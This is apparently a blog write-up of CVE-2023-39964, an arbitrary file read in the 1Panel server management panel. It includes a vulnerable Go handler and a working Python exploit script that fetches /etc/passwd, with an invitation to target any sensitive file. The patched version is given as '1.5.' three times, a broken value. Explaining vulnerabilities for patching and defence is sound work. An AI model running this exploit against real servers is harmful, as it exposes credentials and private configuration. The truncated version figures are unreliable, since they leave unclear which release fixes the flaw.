1Panel is a popular open-source Linux server operation and maintenance management panel used to manage servers effectively. Unfortunately, a security vulnerability (CVE-2023-39964) has been discovered in version 1.4.3, which allows an attacker to read arbitrary important configuration files on the server. The vulnerability is due to insufficient parameter filtering in the api/v1/file.go file, ultimately leading to arbitrary file reads. This can have severe consequences as sensitive information from server configuration files can be exposed. In this post, we will dive deep into the details of this vulnerability, the code snippet responsible for it, and the exploit to carry out an attack.

Vulnerability Details

In the api/v1/file.go file, a function named LoadFromFile reads a file using the path taken from the request (parameter[path]). Because the request parameter is not filtered, attackers can exploit this vulnerability to read arbitrary files on the server. The attack consists of sending the affected server a request that contains the path of the target file, which the server then uses without sanitizing it.

Code Snippet

In the code snippet below from file.go, we can observe that the function LoadFromFile reads the requested file without filtering the path parameter:

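package api

import (
   "os"

   "github.com/gin-gonic/gin"
)

// LoadFromFile returns the content of the file named by the "path" query parameter.
func LoadFromFile(c *gin.Context) {
   // Vulnerable: the client-supplied path reaches the filesystem unchecked.
   path := c.Query("path")
   content, err := os.ReadFile(path)
   if err != nil {
      c.JSON(500, gin.H{"error": "File not found"})
      return
   }
   c.JSON(200, gin.H{"content": string(content)})
}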

Below is an example of exploiting the vulnerability using a Python script:

import requests

target = "http://target-server/"
file_to_read = "/etc/passwd"  # Change this to a target file

url = f"{target}api/v1/file?path={file_to_read}"
response = requests.get(url)
if response.status_code == 200:
    print("File content:")
    print(response.json()['content'])
else:
    print("Error reading the file")

Note that you will have to change target-server to the actual server address and file_to_read to the sensitive file you want to read.

Mitigation

The developers of the 1Panel management panel have released a patch in version 1.5. to fix this vulnerability. To secure your server, update your 1Panel instance to the latest version or, at minimum, version 1.5..

For more information regarding this vulnerability and the patch, please visit:

1. 1Panel Official Website
2. 1Panel GitHub Repository

Conclusion

It is crucial to understand and mitigate the risks associated with software vulnerabilities. In the case of CVE-2023-39964, updating your 1Panel management panel to version 1.5. or higher can prevent this arbitrary file read vulnerability. Remember to keep your software up-to-date and apply security patches as they become available to protect your servers from potential attacks.

Timeline

Published on: 08/10/2023 18:15:00 UTC
Last modified on: 09/08/2023 16:56:00 UTC